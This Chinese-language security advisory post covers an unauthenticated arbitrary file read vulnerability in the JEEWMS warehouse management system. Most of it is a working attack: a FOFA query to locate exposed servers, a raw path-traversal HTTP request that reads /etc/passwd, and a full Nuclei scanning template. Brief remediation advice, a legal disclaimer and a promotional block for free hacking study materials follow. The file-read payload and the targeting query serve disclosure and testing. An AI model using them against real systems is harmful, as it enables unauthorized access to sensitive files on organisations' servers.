JEEWMS存在任意文件读取漏洞

漏洞描述

JEEWMS基于JAVA的仓库管理系统（支持3PL（三方物流）和厂内物流），包含PDA端和WEB端，功能涵盖WMS，OMS，BMS（计费管理系统），TMS，成功应用于多家国内知名大客户，客户群体：冷链，干仓，快消品，汽车主机厂和配件厂等行业。JEEWMS存在任意文件读取漏洞，未授权的攻击者可以通过该漏洞读取任意文件，造成敏感信息泄露。

产品界面

fofa语法

body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"

POC

1. GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
2. Host:
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/

nuclei验证

1. id: JEEWMS-file-read
3. info:
4. name: JEEWMS存在任意文件读取
5. author: nobody
6. severity: high
7. description: |
8. JEEWMS基于JAVA的仓库管理系统（支持3PL（三方物流）和厂内物流），包含PDA端和WEB端，功能涵盖WMS，OMS，BMS（计费管理系统），TMS，成功应用于多家国内知名大客户，客户群体：冷链，干仓，快消品，汽车主机厂和配件厂等行业。JEEWMS存在任意文件读取漏洞，未授权的攻击者可以通过该漏洞读取任意文件，造成敏感信息泄露。
9. impact: |
10. 攻击者可以通过该漏洞读取任意文件，造成敏感信息泄露.
11. remediation: |
12. 升级版本，打补丁
13. metadata:
14. verified: true
15. max-request: 3
16. fofa-query: body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
17. tags: JEEWMS,fileread
19. requests:
20. - raw:
21. - |
22. GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
23. Host: {{Hostname}}
24. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/
26. matchers-condition: and
27. matchers:
28. - type: word
29. part: body
30. words:
31. - "/bin/bash"
33. - type: status
34. status:
35. - 200

修复建议

• 建议升级到最新版本
• 非必要禁止公网访问或白名单访问

•  申明：本账号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。

  免费领取安全学习资料包！

  渗透工具

  

  技术文档、书籍

   

  

  面试题

  帮助你在面试中脱颖而出

  

  视频

  基础到进阶

  环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等

   

  

  应急响应笔记

  

  学习路线